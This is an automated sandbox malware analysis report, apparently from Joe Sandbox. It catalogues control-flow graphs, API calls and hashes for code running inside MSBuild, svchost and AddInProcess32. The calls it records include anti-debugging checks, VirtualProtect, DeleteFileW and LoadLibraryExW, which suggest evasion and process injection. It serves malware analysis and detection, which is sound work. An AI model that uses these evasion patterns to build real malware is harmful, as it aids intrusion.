                                                                          control_flow_graph 2764 f37ed8-f37f64 CheckRemoteDebuggerPresent 2766 f37f66-f37f6c 2764->2766 2767 f37f6d-f37fa8 2764->2767 2766->2767
                                                                          APIs
                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00F37F57
                                                                          Memory Dump Source
                                                                          • Source File: 0000001A.00000002.2874840637.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_26_2_f30000_MSBuild.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0
                                                                          • Opcode ID: 57c8636c577afc220febd02c1c82ee3cdfdaed6310a198e8c626e20da103799f
                                                                          • Instruction ID: 11ffc3a48b485efa3b0c6a168990a9454ef6217fc7e8b204aa235a3db30e1328
                                                                          • Opcode Fuzzy Hash: 57c8636c577afc220febd02c1c82ee3cdfdaed6310a198e8c626e20da103799f
                                                                          • Instruction Fuzzy Hash: 182136B1800259CFCB10CFAAD484BEEBBF4BF48324F24846AE459B7251C7789944CF64
                                                                          Function 00F37EE0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2770 f37ee0-f37f64 CheckRemoteDebuggerPresent 2772 f37f66-f37f6c 2770->2772 2773 f37f6d-f37fa8 2770->2773 2772->2773
                                                                          APIs
                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00F37F57
                                                                          Memory Dump Source
                                                                          • Source File: 0000001A.00000002.2874840637.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_26_2_f30000_MSBuild.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0
                                                                          • Opcode ID: 325974d9f89231bce861f9ae46a73c5839e7503de16f2e8b7bc4a88c219032be
                                                                          • Instruction ID: 448f74e4223a82765a93e594cbe07338465036bb2ed6a1e44658c35cacc6521a
                                                                          • Opcode Fuzzy Hash: 325974d9f89231bce861f9ae46a73c5839e7503de16f2e8b7bc4a88c219032be
                                                                          • Instruction Fuzzy Hash: AD2148B1800259CFCB10CF9AD444BEEBBF4AF48320F14842AE458B3251C778A944CFA4
                                                                          Function 00F3AE6C Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2776 f3ae6c-f3b69a 2779 f3b6a2-f3b6cd DeleteFileW 2776->2779 2780 f3b69c-f3b69f 2776->2780 2781 f3b6d6-f3b6fe 2779->2781 2782 f3b6cf-f3b6d5 2779->2782 2780->2779 2782->2781
                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 00F3B6C0
                                                                          Memory Dump Source
                                                                          • Source File: 0000001A.00000002.2874840637.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_26_2_f30000_MSBuild.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: 427f86232d5f717a609032953f48064c973b379d740ff865cbff9335e48903aa
                                                                          • Instruction ID: 4d113752c0b58daa68905afec45d4a9275197e66e4de039c94699fb730b7aa71
                                                                          • Opcode Fuzzy Hash: 427f86232d5f717a609032953f48064c973b379d740ff865cbff9335e48903aa
                                                                          • Instruction Fuzzy Hash: 5F2156B2C0061A9BCB10CF9AC4457AEFBF4FF48320F10816AD958B7251D738A940CFA4
                                                                          Function 00F3B648 Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2785 f3b648-f3b69a 2787 f3b6a2-f3b6cd DeleteFileW 2785->2787 2788 f3b69c-f3b69f 2785->2788 2789 f3b6d6-f3b6fe 2787->2789 2790 f3b6cf-f3b6d5 2787->2790 2788->2787 2790->2789
                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 00F3B6C0
                                                                          Memory Dump Source
                                                                          • Source File: 0000001A.00000002.2874840637.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_26_2_f30000_MSBuild.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: a1a0572bb143a2e10cea36ede7ada01f8b63029f3b75005af39b79d5546a01ff
                                                                          • Instruction ID: be7f7e4c8cdbcbe6783502826aab8a0c42737074a85589b020dcdc753a7c4b4a
                                                                          • Opcode Fuzzy Hash: a1a0572bb143a2e10cea36ede7ada01f8b63029f3b75005af39b79d5546a01ff
                                                                          • Instruction Fuzzy Hash: 592136B2C0065A8FCB10CF9AD5457EEFBF0BF48320F14816AD858A7651D738A944CFA4
                                                                          Function 00B9D006 Relevance: .1, Instructions: 91COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000001A.00000002.2869951510.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_26_2_b9d000_MSBuild.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ae52bd4ce5a13800f7cd731cfbf6be1f011c68f6cd6172ea6336cdffe2876b97
                                                                          • Instruction ID: 409fe2f75e71ab4882865fb4b71ba616ba2f6d9639bd59806976e20f6e7919fc
                                                                          • Opcode Fuzzy Hash: ae52bd4ce5a13800f7cd731cfbf6be1f011c68f6cd6172ea6336cdffe2876b97
                                                                          • Instruction Fuzzy Hash: 9831727150D3C48FCB038B24C8A4711BF71AF57214F29C5EBD9858F1A3C22A980ACB62
                                                                          Function 00B9D044 Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000001A.00000002.2869951510.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_26_2_b9d000_MSBuild.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5525160faebeb2c263057c2ce2b19ae719faa23bef9984d8f549621e8ca8c81f
                                                                          • Instruction ID: 53ce9ddadc07adf78728284e58d0e109cf7812b4e07e2b09c536a704eb338c69
                                                                          • Opcode Fuzzy Hash: 5525160faebeb2c263057c2ce2b19ae719faa23bef9984d8f549621e8ca8c81f
                                                                          • Instruction Fuzzy Hash: A021FF71604204EFCF14DF25C9D4B26BBA5FB84314F20C6BDE8494B292C73AD846CA62

                                                                          Execution Graph

                                                                          Execution Coverage:10%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:6
                                                                          Total number of Limit Nodes:0
                                                                          execution_graph 13644 7ffd9b870a0d 13645 7ffd9b870a1b FreeConsole 13644->13645 13647 7ffd9b870ae1 13645->13647 13648 7ffd9b8747a6 13649 7ffd9b8747d1 VirtualProtect 13648->13649 13651 7ffd9b874908 13649->13651

                                                                          Executed Functions

                                                                          Function 00007FFD9B873740 Relevance: 1.7, APIs: 1, Instructions: 211COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 431 7ffd9b873740-7ffd9b874906 VirtualProtect 437 7ffd9b87490e-7ffd9b874968 431->437 438 7ffd9b874908 431->438 438->437
                                                                          Memory Dump Source
                                                                          • Source File: 0000001B.00000002.1974901019.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_27_2_7ffd9b870000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2cd0d107aae54e9e530b7cd8ed8832493f59ef701dd32f7fb06c4c27613f2670
                                                                          • Instruction ID: e9511e67554b4057f5ab82a40ba37032f35a0ef758e46ca91f5efe79e95d0215
                                                                          • Opcode Fuzzy Hash: 2cd0d107aae54e9e530b7cd8ed8832493f59ef701dd32f7fb06c4c27613f2670
                                                                          • Instruction Fuzzy Hash: 13617B7090974C8FDB58DF98C895AEDBBF1FF1A304F1041AED449972A2DB74A981CB81
                                                                          Function 00007FFD9B8747A6 Relevance: 1.7, APIs: 1, Instructions: 202memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 534 7ffd9b8747a6-7ffd9b8747cf 535 7ffd9b8747d1-7ffd9b8747d9 534->535 536 7ffd9b8747da-7ffd9b874906 VirtualProtect 534->536 535->536 540 7ffd9b87490e-7ffd9b874968 536->540 541 7ffd9b874908 536->541 541->540
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001B.00000002.1974901019.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_27_2_7ffd9b870000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: ea6b8647a9d1dffe86f6dc8d07fb68c9e33c6332b547b0c26ccf348918b4cbdd
                                                                          • Instruction ID: 4d6d0a89a4bfdff26def151381f3cc6601e47f6f5342431bfdd2e98f42a5ccde
                                                                          • Opcode Fuzzy Hash: ea6b8647a9d1dffe86f6dc8d07fb68c9e33c6332b547b0c26ccf348918b4cbdd
                                                                          • Instruction Fuzzy Hash: 8A516E7090874C8FDB58DF98C895AEDBBF1FB5A314F1402AED449D3252DB74A981CB41
                                                                          Function 00007FFD9B885D7A Relevance: 1.7, APIs: 1, Instructions: 173memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 544 7ffd9b885d7a-7ffd9b889c07 VirtualProtect 548 7ffd9b889c09 544->548 549 7ffd9b889c0f-7ffd9b889c5d 544->549 548->549
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001B.00000002.1974901019.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_27_2_7ffd9b870000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 97176c4ed2b2d59ebe52bae5b424f54e1de0595eee9bd40f57e0470bab23c6aa
                                                                          • Instruction ID: 35e74c02a292908a4651847c8f65a94c040a520b712d55d38e9fbf4139a2ce27
                                                                          • Opcode Fuzzy Hash: 97176c4ed2b2d59ebe52bae5b424f54e1de0595eee9bd40f57e0470bab23c6aa
                                                                          • Instruction Fuzzy Hash: 7A514970918A1C8FDB58DF98C885BEDBBF1FB69310F10526ED44AE3251DB70A981CB81
                                                                          Function 00007FFD9B870A0D Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 551 7ffd9b870a0d-7ffd9b870a19 552 7ffd9b870a24-7ffd9b870adf FreeConsole 551->552 553 7ffd9b870a1b-7ffd9b870a23 551->553 557 7ffd9b870ae1 552->557 558 7ffd9b870ae7-7ffd9b870b2d 552->558 553->552 557->558
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001B.00000002.1974901019.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_27_2_7ffd9b870000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleFree
                                                                          • String ID:
                                                                          • API String ID: 771614528-0
                                                                          • Opcode ID: 0552627bd3849fa4cbd52bdf8b0f491f63d6ecc8b5810a193499a0d285625108
                                                                          • Instruction ID: 203c1191bf833218a08375f0cecf431bf62cf45724dc2cee3e2f63236d777561
                                                                          • Opcode Fuzzy Hash: 0552627bd3849fa4cbd52bdf8b0f491f63d6ecc8b5810a193499a0d285625108
                                                                          • Instruction Fuzzy Hash: A3418E34A0875C8FDB54DF98C889BEDBBF0FB5A321F1002AAD049D7252DB74A985CB41
                                                                          Function 00007FFD9B8704BA Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 560 7ffd9b8704ba-7ffd9b870a80 563 7ffd9b870a88-7ffd9b870adf FreeConsole 560->563 564 7ffd9b870ae1 563->564 565 7ffd9b870ae7-7ffd9b870b2d 563->565 564->565
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001B.00000002.1974901019.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_27_2_7ffd9b870000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleFree
                                                                          • String ID:
                                                                          • API String ID: 771614528-0
                                                                          • Opcode ID: ec7e8679bd94958b5e8a53d583dc403cbdfe37b550ef92cd66ab3a0430360f8d
                                                                          • Instruction ID: 8358f3585d54f737cfb9521507699d0d789d61b7c413c9e1b8ec3ea90fa6f376
                                                                          • Opcode Fuzzy Hash: ec7e8679bd94958b5e8a53d583dc403cbdfe37b550ef92cd66ab3a0430360f8d
                                                                          • Instruction Fuzzy Hash: 1C315974A0871C8FEB58DF98D889BEDB7F0FB19311F10416AD00AE7252DB74A985CB50
                                                                          Function 00007FFD9B940D95 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1404 7ffd9b940d95-7ffd9b940e15 1410 7ffd9b940e1f-7ffd9b940e26 1404->1410
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001B.00000002.1975721581.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_27_2_7ffd9b940000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ")B,
                                                                          • API String ID: 0-3967059106
                                                                          • Opcode ID: 1fb23fcd7ccedaddec364b06bb654154e5f159d1948334ba81478296ec819e98
                                                                          • Instruction ID: 75aa7c752d1e674fff9307883e9b70fef53a032559592d9daf4b5aac1aef7a32
                                                                          • Opcode Fuzzy Hash: 1fb23fcd7ccedaddec364b06bb654154e5f159d1948334ba81478296ec819e98
                                                                          • Instruction Fuzzy Hash: 2A11E542A1EBC51FD30B5B782C316A47F91EF57610F0A06FBD488CB1E3D8485E469362
                                                                          Function 00007FFD9B94139A Relevance: .3, Instructions: 274COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000001B.00000002.1975721581.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_27_2_7ffd9b940000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2ac2205d5ddfbac1f6ac5e5da8c19971ab1bf5784ee72f3f67334b468943aaaa
                                                                          • Instruction ID: 967cd4a5c45cae49ae6b1215567df96de1692e6db22ff315da10961700fd59d7
                                                                          • Opcode Fuzzy Hash: 2ac2205d5ddfbac1f6ac5e5da8c19971ab1bf5784ee72f3f67334b468943aaaa
                                                                          • Instruction Fuzzy Hash: 7E815A72A1F7E95FD766DB2888651943FE1FF16304B0A06BBD489C70A3DA14A946C381
                                                                          Function 00007FFD9B94026B Relevance: .2, Instructions: 221COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000001B.00000002.1975721581.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_27_2_7ffd9b940000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a3da2266546c56006460cca17aafc7c03afef277312f9bfaaf68cf89bf16f5c4
                                                                          • Instruction ID: 7c9b9d71736a565501a1b67d5f2e2d1269f81039039eae891f7c4d146c8211da
                                                                          • Opcode Fuzzy Hash: a3da2266546c56006460cca17aafc7c03afef277312f9bfaaf68cf89bf16f5c4
                                                                          • Instruction Fuzzy Hash: 6F713A31A19A8D8FDB66DF58C8A09F87BF1FF55304F1506AED04ECB1A6DA346942C740

                                                                          Execution Graph

                                                                          Execution Coverage:11.1%
                                                                          Dynamic/Decrypted Code Coverage:54.5%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:11
                                                                          Total number of Limit Nodes:1
                                                                          execution_graph 26699 6aafde2 26701 6aafc71 26699->26701 26700 6aafe0b 26701->26700 26702 6aafe78 LoadLibraryExW 26701->26702 26703 6aafea9 26702->26703 26704 109b650 26705 109b696 DeleteFileW 26704->26705 26707 109b6cf 26705->26707 26708 1097ee0 26709 1097f24 CheckRemoteDebuggerPresent 26708->26709 26710 1097f66 26709->26710

                                                                          Executed Functions

                                                                          Function 06AAF7D8 Relevance: 2.0, APIs: 1, Instructions: 535COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2005 6aaf7d8-6aaf7f8 2008 6aaf7fa-6aaf7fd 2005->2008 2009 6aaf80f-6aaf812 2008->2009 2010 6aaf7ff-6aaf80a 2008->2010 2011 6aaf824-6aaf827 2009->2011 2012 6aaf814-6aaf81d 2009->2012 2010->2009 2016 6aaf829-6aaf84d 2011->2016 2017 6aaf852-6aaf855 2011->2017 2014 6aaf81f 2012->2014 2015 6aaf883-6aaf88c 2012->2015 2014->2011 2020 6aaf892-6aaf899 2015->2020 2021 6aafb75-6aafbad 2015->2021 2016->2017 2018 6aaf85b-6aaf85e 2017->2018 2019 6aaf910-6aaf919 2017->2019 2022 6aaf87e-6aaf881 2018->2022 2023 6aaf860-6aaf879 2018->2023 2025 6aaf9df-6aaf9e8 2019->2025 2026 6aaf91f 2019->2026 2024 6aaf89e-6aaf8a1 2020->2024 2037 6aafbaf-6aafbb2 2021->2037 2022->2015 2022->2024 2023->2022 2030 6aaf8cd-6aaf8d0 2024->2030 2031 6aaf8a3-6aaf8c8 2024->2031 2025->2021 2028 6aaf9ee-6aaf9f5 2025->2028 2032 6aaf924-6aaf927 2026->2032 2036 6aaf9fa-6aaf9fd 2028->2036 2033 6aaf8d2-6aaf8ec 2030->2033 2034 6aaf8f1-6aaf8f4 2030->2034 2031->2030 2038 6aaf929-6aaf938 2032->2038 2039 6aaf943-6aaf946 2032->2039 2033->2034 2043 6aaf8fe-6aaf901 2034->2043 2044 6aaf8f6-6aaf8f9 2034->2044 2045 6aaf9ff-6aafa1b 2036->2045 2046 6aafa20-6aafa23 2036->2046 2047 6aafbb4-6aafbd0 2037->2047 2048 6aafbd5-6aafbd8 2037->2048 2061 6aaf93e 2038->2061 2062 6aafb50-6aafb53 2038->2062 2041 6aaf948-6aaf962 2039->2041 2042 6aaf967-6aaf96a 2039->2042 2041->2042 2057 6aaf96c-6aaf971 2042->2057 2058 6aaf974-6aaf977 2042->2058 2059 6aaf90b-6aaf90e 2043->2059 2060 6aaf903-6aaf908 2043->2060 2044->2043 2045->2046 2050 6aafa4e-6aafa51 2046->2050 2051 6aafa25-6aafa49 2046->2051 2047->2048 2054 6aafbda-6aafbe8 2048->2054 2055 6aafbef-6aafbf2 2048->2055 2066 6aafa5e-6aafa61 2050->2066 2067 6aafa53-6aafa59 2050->2067 2051->2050 2076 6aafc04-6aafc1d 2054->2076 2082 6aafbea 2054->2082 2064 6aafbff-6aafc02 2055->2064 2065 6aafbf4-6aafbfe 2055->2065 2057->2058 2068 6aaf979-6aaf98a 2058->2068 2069 6aaf98f-6aaf992 2058->2069 2059->2019 2059->2032 2060->2059 2061->2039 2081 6aafb58-6aafb5a 2062->2081 2075 6aafc2a-6aafc2d 2064->2075 2064->2076 2077 6aafa6e-6aafa71 2066->2077 2078 6aafa63-6aafa69 2066->2078 2067->2066 2068->2069 2079 6aaf9b3-6aaf9b6 2069->2079 2080 6aaf994-6aaf9ae 2069->2080 2086 6aafc2f-6aafc48 2075->2086 2087 6aafc4d-6aafc4f 2075->2087 2108 6aafc5f-6aafc6b 2076->2108 2120 6aafc1f-6aafc29 2076->2120 2084 6aafa82-6aafa85 2077->2084 2085 6aafa73-6aafa77 2077->2085 2078->2077 2088 6aaf9b8-6aaf9c8 2079->2088 2089 6aaf9cd-6aaf9d0 2079->2089 2080->2079 2091 6aafb5c 2081->2091 2092 6aafb61-6aafb64 2081->2092 2082->2055 2099 6aafae7-6aafaea 2084->2099 2100 6aafa87-6aafae2 2084->2100 2097 6aafa7d 2085->2097 2098 6aaf9d2-6aaf9d5 2085->2098 2086->2087 2103 6aafc51 2087->2103 2104 6aafc56-6aafc59 2087->2104 2088->2089 2089->2098 2105 6aaf9da-6aaf9dd 2089->2105 2091->2092 2092->2008 2102 6aafb6a-6aafb74 2092->2102 2097->2084 2098->2105 2109 6aafaec-6aafb0e 2099->2109 2110 6aafb13-6aafb16 2099->2110 2100->2099 2103->2104 2104->2037 2104->2108 2105->2025 2105->2036 2115 6aafe0b-6aafe15 2108->2115 2116 6aafc71-6aafc7a 2108->2116 2109->2110 2110->2012 2112 6aafb1c-6aafb1f 2110->2112 2118 6aafb4b-6aafb4e 2112->2118 2119 6aafb21-6aafb46 2112->2119 2122 6aafc80-6aafca0 2116->2122 2123 6aafe16-6aafe2a 2116->2123 2118->2062 2118->2081 2119->2118 2140 6aafdf9-6aafe05 2122->2140 2141 6aafca6-6aafcaf 2122->2141 2129 6aafe2c-6aafe31 2123->2129 2130 6aafe32-6aafe70 2123->2130 2129->2130 2134 6aafe78-6aafea7 LoadLibraryExW 2130->2134 2135 6aafe72-6aafe75 2130->2135 2137 6aafea9-6aafeaf 2134->2137 2138 6aafeb0-6aafecd 2134->2138 2135->2134 2137->2138 2140->2115 2140->2116 2141->2123 2143 6aafcb5-6aafce4 call 6aa9bf8 2141->2143 2153 6aafd26-6aafd3c 2143->2153 2154 6aafce6-6aafd1e 2143->2154 2157 6aafd5a-6aafd70 2153->2157 2158 6aafd3e-6aafd52 2153->2158 2154->2153 2163 6aafd8e-6aafda1 2157->2163 2164 6aafd72-6aafd86 2157->2164 2158->2157 2167 6aafdaf 2163->2167 2168 6aafda3-6aafdad 2163->2168 2164->2163 2169 6aafdb4-6aafdb6 2167->2169 2168->2169 2170 6aafdb8-6aafdbd 2169->2170 2171 6aafde7-6aafdf3 2169->2171 2172 6aafdcb 2170->2172 2173 6aafdbf-6aafdc9 2170->2173 2171->2140 2171->2141 2174 6aafdd0-6aafdd2 2172->2174 2173->2174 2174->2171 2175 6aafdd4-6aafde0 2174->2175 2175->2171
                                                                          Memory Dump Source
                                                                          • Source File: 00000025.00000002.2938814555.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_37_2_6aa0000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 28b410ac54b2095de045456466780910b25d83868fe8c13fafab2eec074f0152
                                                                          • Instruction ID: 012803190bf2c53dfcf1f6822051701dd12d34f00ba087096f4e57c39e83f55b
                                                                          • Opcode Fuzzy Hash: 28b410ac54b2095de045456466780910b25d83868fe8c13fafab2eec074f0152
                                                                          • Instruction Fuzzy Hash: 88129234E002059FDF64EF69D980BAEB7B2EB88314F10852AD409EB355DB35EC46CB91
                                                                          Function 01097ED8 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2373 1097ed8-1097f64 CheckRemoteDebuggerPresent 2375 1097f6d-1097fa8 2373->2375 2376 1097f66-1097f6c 2373->2376 2376->2375
                                                                          APIs
                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01097F57
                                                                          Memory Dump Source
                                                                          • Source File: 00000025.00000002.2876276275.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_37_2_1090000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0
                                                                          • Opcode ID: fd15156f32e3dc2894e455c63db10319596e6004cacb82e83d279d9e45b9122e
                                                                          • Instruction ID: 2f091de8776e598950a4d90ff8f6100c2684ec81debd79ad697765d1fac36804
                                                                          • Opcode Fuzzy Hash: fd15156f32e3dc2894e455c63db10319596e6004cacb82e83d279d9e45b9122e
                                                                          • Instruction Fuzzy Hash: F52139B2800259CFCB10CFAAD484BEEBBF4AF48310F24846AE459B7251C7389944CF65
                                                                          Function 01097EE0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2379 1097ee0-1097f64 CheckRemoteDebuggerPresent 2381 1097f6d-1097fa8 2379->2381 2382 1097f66-1097f6c 2379->2382 2382->2381
                                                                          APIs
                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01097F57
                                                                          Memory Dump Source
                                                                          • Source File: 00000025.00000002.2876276275.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_37_2_1090000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0
                                                                          • Opcode ID: d46bfb245d6c8616cc8e0c47ebf0a8897e149a57a87e2f8db7d75be4cd6c2e9c
                                                                          • Instruction ID: 26f49d1d4f353d519edfa9130dcfc4762e9e461d09000694f63d6d1d000b88e5
                                                                          • Opcode Fuzzy Hash: d46bfb245d6c8616cc8e0c47ebf0a8897e149a57a87e2f8db7d75be4cd6c2e9c
                                                                          • Instruction Fuzzy Hash: 3C2125B2800259CFCB14CF9AD484BEEBBF4AF49320F14846AE459B7250D778A944CF65
                                                                          Function 0109B648 Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2385 109b648-109b69a 2387 109b69c-109b69f 2385->2387 2388 109b6a2-109b6cd DeleteFileW 2385->2388 2387->2388 2389 109b6cf-109b6d5 2388->2389 2390 109b6d6-109b6fe 2388->2390 2389->2390
                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 0109B6C0
                                                                          Memory Dump Source
                                                                          • Source File: 00000025.00000002.2876276275.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_37_2_1090000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: 7ea926d2183c77d1ba545daa5c02f79cc70e4b6f55f0b9d9c3b2ac14cf6b8e37
                                                                          • Instruction ID: cf14fffd90e852b525adf289d9bcaab7fefbcfa27aab37035bcf096042f176b2
                                                                          • Opcode Fuzzy Hash: 7ea926d2183c77d1ba545daa5c02f79cc70e4b6f55f0b9d9c3b2ac14cf6b8e37
                                                                          • Instruction Fuzzy Hash: 4B2113B1C0061A8BDB14CF9AD545BAEFBF0AB48320F14816AD858A7250D738A940CFA5
                                                                          Function 0109B650 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2393 109b650-109b69a 2395 109b69c-109b69f 2393->2395 2396 109b6a2-109b6cd DeleteFileW 2393->2396 2395->2396 2397 109b6cf-109b6d5 2396->2397 2398 109b6d6-109b6fe 2396->2398 2397->2398
                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 0109B6C0
